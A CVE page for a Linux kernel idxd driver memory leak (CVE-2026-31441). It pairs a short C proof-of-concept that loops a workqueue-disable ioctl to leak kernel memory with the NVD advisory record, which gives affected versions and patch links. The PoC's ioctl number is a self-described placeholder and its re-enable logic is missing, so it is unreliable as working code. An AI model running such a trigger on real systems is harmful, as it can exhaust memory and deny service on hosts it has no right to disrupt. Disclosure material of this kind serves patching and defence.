CVE-2026-31441

/* * PoC for CVE-2026-31441: Linux kernel idxd memory leak * This code triggers the vulnerable reset path repeatedly. * Requires /dev/idxd device access. */ #include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #define IDXD_IOCTL_DISABLE_WQ 0x8001 // Example IOCTL, may vary based on kernel config int main() { int fd, i; // Open the idxd device node (example path) fd = open("/dev/idxd/wq0.0", O_RDWR); if (fd < 0) { perror("Failed to open device"); return 1; } printf("Starting memory leak trigger loop...\n"); // Loop to trigger the reset/cleanup path multiple times for (i = 0; i < 10000; i++) { // Call IOCTL to disable/reset the work queue // This invokes idxd_wq_disable_cleanup where the leak occurs if (ioctl(fd, IDXD_IOCTL_DISABLE_WQ, 0) < 0) { // perror("ioctl failed"); // In a real scenario, the device might be in a specific state // Error handling might be needed to re-enable the WQ to continue the loop } // Logic to re-enable/reconfigure WQ would go here to loop the exploit // For demonstration, we assume the environment allows repeated triggers } close(fd); printf("Loop completed. Check kernel memory (slabtop) for leaks.\n"); return 0; }

{"cve": {"id": "CVE-2026-31441", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-22T14:16:37.530", "lastModified": "2026-05-07T19:30:23.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: Fix memory leak when a wq is reset\n\nidxd_wq_disable_cleanup() which is called from the reset path for a\nworkqueue, sets the wq type to NONE, which for other parts of the\ndriver mean that the wq is empty (all its resources were released).\n\nOnly set the wq type to NONE after its resources are released."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.7.10", "versionEndExcluding": "5.8", "matchCriteriaId": "92A73C33-7B25-44AD-A976-034B527AB896"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.8.1", "versionEndExcluding": "6.1.168", "matchCriteriaId": "D301ED86-94B4-4354-BAE0-4EF47270600A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.131", "matchCriteriaId": "CE6ED4D4-0046-4573-BFA9-D64143B6A89F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.80", "matchCriteriaId": "97EB19EC-A11E-49C6-9D2F-6F6EC6CB98B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.21", "matchCriteriaId": "ED39847A-3B46-4729-B7CA-B2C30B9FA8FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.11", "matchCriteriaId": "4CA2E747-A9EC-4518-9AA2-B4247FC748B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.8:-:*:*:*:*:*:*", "matchCriteriaId": "0E2DC66F-4A95-475F-B8B6-191DEC1E7EF6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.8:rc6:*:*:*:*:*:*", "matchCriteriaId": "69E12239-342D-43B2-93F0-2760623AFEEF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.8:rc7:*:*:*:*:*:*", "matchCriteriaId": "CA1501B4-945A-45C2-8E7C-65085BF91C76"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0c3d3ac57e3c52b570b8c695903306bff07e04c8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/39c1504e0e76bcfb93991fd94288a83e05d13b51", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/54d77cc0c40ca2f894859dc7b3c52997574f1a2a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a16098a2f0c11ee5e04e23aa7478ca1fcfb0f658", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a9e7815d38629bcf59d3005001f1f315424a58de", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d9cfb5193a047a92a4d3c0e91ea4cc87c8f7c478", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}